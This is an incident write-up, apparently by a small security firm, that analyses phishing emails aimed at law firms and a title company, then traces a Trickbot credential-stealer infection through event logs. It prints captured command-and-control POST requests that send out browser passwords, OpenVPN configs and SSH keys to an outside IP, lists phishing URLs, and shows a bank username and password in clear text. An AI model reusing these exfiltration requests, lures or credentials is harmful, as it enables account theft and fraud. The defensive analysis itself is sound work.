Phishing in the month of July while forgetting your bank login

or

How To Fool a Legal Professional and Laugh your Way Home

Humans are horrible at mitigating risk. As complex creatures, we are the sums of all our parts which include experience and emotion, this can produce unwelcomed consequences depending on the path you walk. Complacency causes people to ignore the obvious, worse the culture of instant gratification or “do these twenty things at once” simply does not help the matter. There exists a common misunderstanding of what cybersecurity is and this is compounded with the fact that people simply do not like to admit they have a problem, whether it be alcoholism or a common drug addiction, rarely will you see a business say, “this is messed up and we need to fix this.” They will simply not admit it, quickly change usernames and passwords, hope it goes away and possibly call the Feds on you if you show them where their breach is. No profession is more guilty of this cardinal sin than attorneys.

I am not here to lambaste lawyers, read Shakespeare’s Henry VI, or retain one if you want that. What I hope to achieve in this discussion is to shine a light on common misconceptions on phishing and how it can be avoided, it is not an issue of complex cyber solutions, it is a fundamental issue of changing the way we think and approach problems. We then conclude with an interesting information stealer that pilfers credentials that we came about as an indirect result of the phishing.

Act I:

Phishing Email One:

OneNote is not for email

For the sake of keeping the peace I must blur the domain name and the ip address in these images. As Cybercrypto is not a litigious company and the little resources we have we rather use to pay our data-center and internet bills, this is the best path. The first email appears to come from a local attorney and is sent to other attorneys and those he has had contact with. Observe the redacted screenshot below:

Overall it looks innocuous. The first thing we should observe is that the TO field is empty. That is the first sign of evil. The other sign of trickery is the hyperlink. For the most part in law, you will know ahead of time if you are getting a document that requires you to click on a link. This will either be an Adobe Sign document or Docusign. However alas, the poor legal assistant that is overly caffeinated and in fear of losing their job will click on the little hyperlink.

The next part is the more impressive part, albeit elementary, it shows some level of imagination. Upon clicking the hyperlink, the user is sent to a OneNote screen located at:

https[:]//onedrive[.]live[.]com/redir?resid=5ADDC66AFDE9F05A%212582&authkey=%21AAv8Yo6ZPSjDv-8&page=View&wd=target%28Quick%20Notes.one%7C2c6fc219–060e-448b-b3b1–31cbe4149ce5%2FFOR%20YOUR%20REFERENCE%7C8b166752–29ef-4612-a09d-74bfc3e63689%2F%29

It has been several days but at the time of the writing of this article which is about two weeks after the phishing and malware were discovered by Cybercrypto that link is still up. I will redact it in the screenshot.

Feel free to visit it. As you are reading this article, I will establish that you have a level of intelligence so I will not insult you by pointing out the obvious. Regardless the fact that its still up means it is in the public domain. Bear in mind the entity that was being phished was informed. Per why is it still there? Well that is on them.

Below is the screenshot with a redaction:

All this is, is a OneNote page with a Note on it with a link to a so-called secure message. There is nothing highly innovative here as its simply a hyperlink to another page in cased in table format. What is interesting is that the phisher went to the extent of putting up this OneNote page at all. To the unsuspecting and the uninformed it gives them the impression that this must be legitimate. The statement “Secured by One-Note Encryption” is simply absurd, but we cannot expect your end user to know the difference.

Fortunately, one end-user who received this reported it. However, others clicked on the link which took the user to:

https[:]//dazianhome[.]com/layouts/planning/plans

At the time of this writing this link is no longer live. When we investigated it, we were presented with a Microsoft 365 login page. There is no doubt that this was an attempt to harvest credentials. The user after being led to the login page under a false sense of security would have entered in their username and password. This bared a question for us, who did this and why was it coming from a law firm.

Fortunately for us we had one of the original emails, this means the direct email, no forward or anything like that. The headers would have been untouched, and as you know, the headers tell us everything. Now I am only redacting the domain name of the firm in the header, but I am not redacting the IP address, otherwise the point of discovery becomes second hand. I want you to see the data as unadulterated as possible.

The header looks as follows:

What do we take away from this header?

a) The sender’s ip address is 208.70.210.4

b) protection.outlook.com designates the mail as permitted from the law firm domain.

**We establish here that the sender had to have some level of credentials. Microsoft 365 will not allow an smtp connection or any connection to occur unless there is some level of successful authentication.

c) asp.reflexion.net is a Sophos company

d) a HELO is received from HELO e1e-rtc-cs-06.aws.reflexion.local on an internal IP address

e) someone is using qmail

f) the architect did not sanitize his/her x-originating-ip header. We see it at 102.89.3.114. We look deeper and that IP address takes us to the below –

After further research we see that our nefarious actor is using Windows –

Web Browser/s on this IP: Firefox 74

OS on this IP: Windows 7 x64 Edition

A visit via Google maps shows the below:

Someone in the office had their credentials compromised for this thing to go out. A visit to portal.azure.com or protection.office.com would allow the owner of the domain to investigate as to isolate when and who would have had their credentials pilfered. Unfortunately, we have no control over the systems at the compromised domain. We did have the email and provided the above and informed the domain owner.

Act Two:

The second email while not as pretty is convincing and in that can be damning. Observe the redacted below:

It appeared that the law firm that was compromised sent these emails to whoever was on their contact list. This included other law firms as well as medical providers. There are two things that stand out here.

a) The Office 365 logo with an open document link that takes you to the page where it attempts to harvest the credentials of the user. The url is –

https[:]//us4.campaign-archive[.]com/?u=d360998b9516757001abd218f&id=60bd4aeffe

That url is no longer active and it redirects to a page which states the following –

You probably found this page because one of our subscribers used Mailchimp to send you an email campaign and you traced a link in the email back here to investigate. Mailchimp is a marketing platform that serves millions of companies of all shapes and sizes, from all over the world. We send more than 1 billion emails every day, and we help our customers comply with spam laws and best practices so they can get their campaigns into their subscribers’ inboxes.

|\/| _ .| _|_ . _ _

| |(_|||(_| )|||||_)

|

Love What You Do

b) The more incendiary quality of this email is that it has the professional signature of the assistant to counsel, along with a link to their website. Further in the office 365 window we see the email of the assistant. In itself the signature looks authentic, but combined with the Microsoft 365 link and the lack of personal message, “Hi name@domain.com” (is not really convincing) makes for high suspicions and as you see it was sent to me with suspicion.

As before the header tells us a story –

What do we take away from this header?

a) We see an SPF record for the domain as well DMARC and DKIM

b) mail-eopbgr680128.outbound.protection.outlook.com designated the permitted sender. This is a Microsoft server

c) Much like before the individual did not sanitize the x-originating-ip header, so we see and IP address of 64.190.94.168. This means the origin came from the below:

64.190.94.168

Country: United States

Organization: Cloud South

Updated: 2020–06–06T06:48:38.166712

Number of open ports: 1

Ports: 5985/tcp

Port 5985 is usually WinRM, we did not scan the server beyond the obligatory port scan. Our purpose was to identify the origin.

Conclusion:

Common sense is paramount and until people change the way they think this will continue. There is no one cure as every setup is unique and some professions just tend to be horribly cheap. It does not help though to merely change your passwords and pretend nothing has happened. The tools are there to prevent these things from happening. As an example, for clients that use the Microsoft 365 infrastructure we setup the alerts so if there is someone logging from an odd place, you will know about it. See below –

As you can see, the chance of the business finding out how this happened is relatively high, it just requires the will to do it. Compounded with training your users, I believe we have a fighting chance.

Act Three:

Title Companies –

Originally the intention of this article was to shine a light on how attorneys are irresponsible at securing their data. While pondering it occurred to me that I had to touch on the issue of Title companies. During the process of a purchase of a home, Title companies in the United States hold a very important role as it is the title company that holds your data. One breach, one incident, and the realtor, the buyer, and the finance company all get dragged down. I bring this up because I have direct experience with individuals who have suffered because Title companies much like others take a lax view to the valuable data that they hold.

For an individual who is not tech savvy, it is possible to fool the target by buying a fake domain that is like one that the target is used to seeing. However, the caveat for the phisher to be successful is to have priory knowledge of his target and what they do for a living. For a targeted attack this requires some work, and the best point of entry is the mail server.

Recently we came across the below which came to an attorney at a firm we service. The attorney’s name has been redacted but I have left the Title company information intact, the reason for this:

1) I called the office from where this was generated and was summarily dismissed in a very curt manner, I identified myself as a cybersecurity professional representing my client, and attempted to alert them, I was summarily dismissed and told not to click on anything.

2) An email was sent to their CTO and management, no reply — not even a “Don’t worry we got this”

Hence, I give you the below:

This email is well done, you have the following:

a) A loan number for the subject line

b) First Alarm: In the From section both the corporate address and what looks like a person’s personal email address as well –

Stewart Title <tania.swanberg@stewart.com> tania.stewarttitle@aol.com

This is not normal but to the untrained individual they would merely see the name of the individual that they are used to doing business with along with the domain name. In the target’s mind the personal email can be inconsequential

c) A big ostentatious Trusted and Verified Logo

d) Second Alarm: The target’s email address is listed in a line that says “This email is intended for” follow by a hyperlink to see an encrypted message. To further emphasize the desire to click on the link a separate button with the text Access File. The hyperlink is https[:]//u15947665.ct.sendgrid[.]net/ls/click?upn=jI8CV-2B0daa-2Fwae69VFg4EdhxwOATHRfD-2BxkgtB-2FCGjz0iYn-2FnKSaizaF-2FhysrKe6PfcbdkVi-2Bl5pOoLxnvWk8ibcpFOfPBY9apxJqyA-2BHHA-3Dmr-P_YqVc2Q6TaxfIVY64HpFtF4XoX-2FJvHUTpCviI0XA78ZMQzHOZqyjaxRIdmVXLvBIzzbKAFcgQOihFO7jpNOHxgDtzY84zn51oAipYwv41OFSBD22ab-2FF9bWjKr693sXjX7x9Vuxlh6067x84RYcL8v4ZZdlnKcflq7CvxlqAesGTH-2FzRiaz7IJ4GMaNxhvbVIuGHP5s06QL6nw75cjTPmRFRB77YxMz4sSIo-2BgLniPEo-3D

Obviously not Stewart Title nor would most likely they send such a thing.

e) The rest of the email contains the office address along with the signature

As always, the email can tell us a lot more.

The header speaks to us –

The first thing that stands out here is the IP address where this is email is from.

Tue, 23 Jun 2020 18:26:25 +0000 (UTC) X-Virus-

Scanned: Proofpoint Essentials engine Received: from mx1-us1.ppe-hosted.com (unknown[10.7.66.37]) by mx1-us1.ppe-hosted.com (PPE Hosted ESMTP Server) with ESMTPS id DC2D52200A7

protection.outlook.com: domain of transitioning sendgrid.net discourages use of 148.163.129.52 as permitted sender

The phisher is also using SmartSend as the mailer. The app looks at when a recipient opens a message and then schedules the next mailing at times closest to the last open. What we don’t have is the originating IP but this is most likely a larger operation. At the time of this writing the link ceased to work. For this I am content as it was reported. Currently the below shows up when the link is hit –

<Error>

<Code>UserProjectAccountProblem</Code>

<Message>User project billing account not in good standing.</Message>

<Details>The billing account for the owning project is disabled in state closed</Details>

</Error>

The URL redirect takes the user to the below:

https://storage.googleapis.com/aadobe-tombac-780141661/index.html

Here was the original request:

GET https://u15947665.ct.sendgrid.net/ls/click?upn=jI8CV-2B0daa-2Fwae69VFg4EdhxwOATHRfD-2BxkgtB-2FCGjwiJFuSIw7deyo58A-2BrZRYCJOytdbkovOCmcbsyFAJKGL0Cu9CiGM4PhnENEukVPFE-3D7_Uw_YqVc2Q6TaxfIVY64HpFtF4XoX-2FJvHUTpCviI0XA78ZMQzHOZqyjaxRIdmVXLvBIztUV1uNjtg2wgJJGEPtgq9K4oFhsgj5NO23aSjd16YxhyGs9df7tVXsHS8OkWSsnaESkUkNJ8EVGqHKnHDFyAlrNzgdhILLMvYD-2FzBUkrgg3hP7lpNLGxgm3uqdWtZqsE4-2BKUBZP4kCRDHcX2yXRofr0f-2BBos9Fw599jpCVLBNDm4qwFn4LEle85soAnJ0crN HTTP/1.1

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Connection: keep-alive

Upgrade-Insecure-Requests: 1

Host: u15947665.ct.sendgrid.

which then gave us the following response:

HTTP/1.1 302 Found

Server: nginx

Date: Fri, 10 Jul 2020 23:27:20 GMT

Content-Type: text/html; charset=utf-8

Content-Length: 88

Connection: keep-alive

Location: https://storage.googleapis.com/aadobe-tombac-780141661/index.html

X-Robots-Tag: noindex, nofollow

At the time when we first got a hold of the email the url was hosting a webpage that was harvesting Microsoft 365 credentials. The links were reported immediately also to their respective providers, we obviously would not wait for the company to do something about it. We recommended to each entity discussed in this narrative to go the security portal in Microsoft 365 and look at their user history, it would be there where you would find who may had their account accessed. Microsoft 365 provides excellent tools for auditing and it is disappointing when we see people simply ignore it.

An attitude of arrogance does not protect your client’s data, as mentioned previously, our office has handled cases where the phisher was able to get the company directory, identified the workers and the realtors, sent an email to the target convincing them to send the money via wire to the account number given by them. One of the clients, an elderly woman did so because the phisher not only spoke with knowledge of her paperwork but spoke of other people in the office, and yet opposing counsel in this case would not acknowledge that it was a breach. Each one of these breaches indicate someone got in and did their research. A person’s data is important, a breach can effect that person’s life for years to come through no fault of their own. As a holder of such data people have a moral responsibility to safeguard it and not treat it as an afterthought. I am disturbed by the lack of thought given to cybersecurity, worse those who have that lack of thought practice the same tired corporate rhetoric that looks it was written on a bathroom wall that was claimed by zombie Human Resources People that repeat the same diatribe over and over again but have no idea of the technology or the landscape. Though I am disturbed by this, I believe that pragmatism shall win the day.

Which now leads us to something different which we encountered in our travels.

Section II

Targeted malware aims to steal data and send it back to a source. The vector of infection or point of entry will always be external to the system. Something must be placed on the computer. Much like a disease, your going to catch it from somewhere. Signatures are problematic, there are maladies that do not register and only until the crowd has sourced the infection does it become known publicly. Neural networks and machine learning are a good start but that can be mitigated (more on that in a later article). For this scenario we take it to the ground level, alerts and watching directories that bear watching.

The first sign is obvious and by far one of the most egregious. We always observe the user’s home directory, this will always be a point of entry and it is foolish not to set alerts there. What we see is a dll at work.

In our Elastic setup we pull both Sysmon and we audit the logs.

Figure One:

Figure Two:

What we are seeing here is a dll named sppcommpatch.dll bring registered for use in the operating system via the rundll32.exe program. The DLL is a dynamic link library, the purpose of rundll32.exe is to run routines held in the DLL. The fact that you have received an alert that is running should be of immediate concern and remediation must begin — or simply run to that workstation and fast.

The next odd thing we bear witness to is what the logs tell us about the DLL –

Here we see the image loaded which is the questionable DLL. However, we are then presented with what is the original file name of the dll and a product description. It is listed as File comparison utility and under Product it says Win 7 DDK driver. DDK stands for Driver Development Kit. I suppose if this could be a pun, if so — a very good one.

Once the DLL is registered a new process is created, a process that is familiar but will not do what it normally is supposed to do –

Windows Error Reporting is an event-based infrastructure meant to gather information about hardware and software problems that Windows can detect. Here we see the process being created at the behest of our suspect DLL. Regardless of any scenario, you should always have an alert for Windows Error Reporting, this however is not it.

The wermgr.exe process has now created an svchost.exe process. Note that odd directory in Roaming — “ArtPress” — this was never on the computer.

We also look for changes to permissions. Specifically, Event ID 4670 which will alert you when the access control list to an object change. Here we the permissions on svchost.exe changing. By this time, you can surmise that something is about to happen.

Time For A Trip:

External connections should always be monitored and logged — this is a must. You as the Chief knows where your users go, especially in a small shop, its not hard to check if someone is going to somewhere, they do not need to be going to. If I have a medical clinic, I don’t want any social media, or external sites beyond what my users require. Hence, we have Event ID 5152 — the Windows Filtering Platform has blocked a packet –

It is essential that we know what process started this, Event 5156 — the Filtering Platform Connection — it reveals to us our devil:

A copy of wermgr.exe is initiating these connections. The server its calling:

WELCOME TO JAKARTA

Our command and control server is here. Though we get a lot by watching the Windows logs, one trick pony we are not — we aggregate from our other sources.

We have a syn packet at 0 bytes followed by an ack at 0 bytes concluding with an ACK and PSH of only 168 bytes. Clear text that is shown here displays something about Internet Widgets Pty. We have lots of disk space so we save our pcap files and use them for search and alerts. We see here an encrypted alert, bears more research later — but it stood out.

We also use Security Onion which alerts us as well to anything out of the norm. Snort is our friend. We have confirmation now that the traffic mentioned above is that going to a CnC server.

This thing is sneaky because there is not just one connection being made, there are several, for our next stop svchost.exe is piloting the jet.

Event ID 5156 –

Notice the odd port — 8082. Your firewall should only be allowing your users out on the traditional ports unless something different is needed, and if so, you should be accounting for it.

We have arrived in Cambodia in the house of Mekongnet PP

Our Security Onion box alerts us that this is a CnC server –

One of the most important questions we have, what is being communicated to this server. Fortunately, unlike the first CnC we have clear text. Apparently, our workstation and network have made a full introduction to our associates at MeKongNet PP.

The information is very telling and the CnC now knows a limited amount of our Active Directory layout, but they know who I am and what kind of network I am on. All this transmitted over eleven packets. Notice the server name of the CnC:

HTTP/1.1 200 OK
server: Cowboy
date: Sat, 11 Jul 2020 21:33:23 GMT
content-length: 3
Content-Type: text/plain

This is simply clever and excellent manner of reconnaissance.

“svchost.exe” now takes us to Brazil, Event ID — 5156 –

As before we see communicating going through port 8082. Our Security Onion box alerted us to twenty-two entries. The following stand out:

As you can see our Security Onion box alerted us to the fact that the above-mentioned IP address as a CnC. What is transmitted in the packets is interesting and reveals to us not the family but the type of malware this is. In the prior transmission you see the information of the user, computer, domain, and email addresses. In this one we see formdata:

Note also that its posting to server: Cowboy. There are some fascinating things here and we see it in plain text write in front of us.

In one packet we see:

— — — — — -LSGMBXVNQBJTUJYR
Content-Disposition: form-data; name=”formdata”

{]} — — — — — -LSGMBXVNQBJTUJYR
Content-Disposition: form-data; name=”billinfo”

{]} — — — — — -LSGMBXVNQBJTUJYR
Content-Disposition: form-data; name=”cardinfo”

{]}
— — — — — -LSGMBXVNQBJTUJYR —

The form data above is pretty obvious, but if you need more — the next packet:

2020/07/11 17:34:14 ack psh 426 bytes

POST /chil63/ASYLUM_W10010586.58C3EF2EEAC32689466936E21A53A552/81/ HTTP/1.1
Accept: */*
Content-Type: multipart/form-data; boundary= — — — — -FAEUAVUROVRVHWVJ
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: 170.238.117.187:8082
Content-Length: 319
Connection: Close
Cache-Control: no-cache

2020/07/11 17:34:14 ack psh 319 bytes

— — — — — -FAEUAVUROVRVHWVJ
Content-Disposition: form-data; name=”data”

https://login.microsoftonline.com/|rgonzalez@cybercrypto.net|
https://www.bankofamerica.com/|justin1893|Yulia123456!

— — — — — -FAEUAVUROVRVHWVJ
Content-Disposition: form-data; name=”source”

IE passwords
— — — — — -FAEUAVUROVRVHWVJ —

This malware is attempting to extract as much as possible as you see below — it even wants openvpn logins.

2020/07/11 17:35:13 ack psh 426 bytes

POST /chil63/ASYLUM_W10010586.58C3EF2EEAC32689466936E21A53A552/81/ HTTP/1.1
Accept: */*
Content-Type: multipart/form-data; boundary= — — — — -KYMEAHVVEDIFOTBH
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: 170.238.117.187:8082
Content-Length: 219
Connection: Close
Cache-Control: no-cache

2020/07/11 17:35:13 ack psh 219 bytes

— — — — — -KYMEAHVVEDIFOTBH
Content-Disposition: form-data; name=”data”



— — — — — -KYMEAHVVEDIFOTBH
Content-Disposition: form-data; name=”source”

OpenVPN passwords and configs
— — — — — -KYMEAHVVEDIFOTBH —

2020

And of course, I was surprised by the gaul of this (surprised but impressed):

2020/07/11 17:35:46 ack psh 426 bytes

POST /chil63/ASYLUM_W10010586.58C3EF2EEAC32689466936E21A53A552/81/ HTTP/1.1
Accept: */*
Content-Type: multipart/form-data; boundary= — — — — -YLXXQECBCPUHXJQX
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C;

.NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: 170.238.117.187:8082
Content-Length: 210
Connection: Close
Cache-Control: no-cache

2020/07/11 17:35:46 ack psh 210 bytes

— — — — — -YLXXQECBCPUHXJQX
Content-Disposition: form-data; name=”data”



— — — — — -YLXXQECBCPUHXJQX
Content-Disposition: form-data; name=”source”

OpenSSH private keys
— — — — — -YLXXQECBCPUHXJQX —

Guard your openssh keys — the world wants them. Even if you don’t.

Persistence in a system establishes a foundation for malware to stay where it is and continue to send data. For this reason, we monitor certain registry entries. One of them is –

HKLM\System\CurrentControlSet\Control\SecurityProviders\WDigest\UseLogonCredential

The reason for this is this is obvious; we want to know who and what logs in and out of the machine.

In our logs we see the following which we are alerted to:

It is not a coincidence that we then are alerted to the following:

This is Event ID 4634. The time of registry being accessed is 17:34:16.145. The above Event for the logoff occurs at 17:35:28.302. Note the below:

The Process ID that accessed the registry to begin with was Process ID: 6732 who was created by wermgr.exe and we alerted of this earlier.

It is therefore no coincidence that while this malady was running the user account was logged off, which quite alarming yet fascinating to witness.

Conclusion:

There is no doubt that this malware is an information / credential stealer. It was discovered at a site that is owned by a “legal professional”. This was of course running in our lab and afterwards I uploaded the file to any.run to where we have a subscription and sure enough, not only did we confirm a credential stealer, but we confirmed trickbot.

When a Title Company, an Attorney, or any entity holds your data that you have given to them, they have a responsibility to safeguard it. It surprises me how society is so quick to point fingers at Google and Facebook and push legislation, when governmental entities, attorneys, the courts, banks, title companies, take an incredibly lax approach to securing their data. It’s absurd and professionally offensive because even when confronted with such revelations, the level or arrogance is astounding.

So, what are we to do, well that is simple. Do not depend on these so-called professionals to help you, inform yourself, research — information is out there, all you must do is ask questions. Why do you need my Social Security Number? What is your cybersecurity policy? Who do you share information with? Do you audit your employees to make sure they are not abusing the data? You need to do this, because if your identity is stolen, no one is going to help in a way that is effective.

Who is the best defense? They are partners — information and you!